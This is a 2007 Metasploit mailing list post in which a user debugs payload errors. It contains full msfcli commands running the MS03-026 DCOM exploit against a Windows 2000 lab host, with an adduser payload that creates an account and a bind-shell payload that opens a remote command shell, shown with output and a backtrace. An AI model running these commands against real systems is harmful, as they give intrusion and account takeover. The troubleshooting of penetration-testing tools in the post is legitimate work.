Metasploit mailing list archives
Re: windows/exec Payload problems.
From: a10n3.s7r1k3r at gmail.com (Kashif Iftikhar)
Date: Wed, 24 Jan 2007 13:49:20 +0000
Here is some additional info. I get the same error when I use the payload windows/adduser but the user gets added even after getting the error.

Also, if I terminate the windows session by typing "exit" in windows shell, I seem to be able to exploit the same box again in MSF3. So the repeated exploiting problem is resolved but the payload issue still remains. Here is the sample output.

***********************************************************************************
root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli "exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/adduser" RHOST="192.168.0.17" USER="kkj1" PASS="kkj1" E
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ...
[*] Sending exploit ...
Exploit failed: end of file reached
Backtrace:
./lib/rex/io/stream.rb:58:in `sysread'
./lib/rex/io/stream.rb:58:in `read'
./lib/rex/io/stream.rb:181:in `get_once'
./lib/rex/proto/dcerpc/client.rb:150:in `read'
./lib/rex/proto/dcerpc/client.rb:230:in `call'
./lib/msf/core/exploit/dcerpc.rb:97:in `dcerpc_call'
/pentest/exploits/framework-3.0-beta-3/modules/exploits/windows/dcerpc/ms03_026_dcom.rb:206:in `exploit'
./lib/msf/core/exploit_driver.rb:189:in `job_run_proc'
./lib/msf/core/exploit_driver.rb:152:in `run'
./lib/msf/base/simple/exploit.rb:118:in `exploit_simple'
./lib/msf/base/simple/exploit.rb:127:in `exploit_simple'
./msfcli:153

root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli "exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/shell/bind_tcp" RHOST="192.168.0.17" E
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.0.21:41500 -> 192.168.0.17:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator Guest IUSR_COMPULIFE IWAM_COMPULIFE kkj kkj1
The command completed with one or more errors.

C:\WINNT\system32>exit
exit
Abort session 1? [y/N] y
********************************************************************************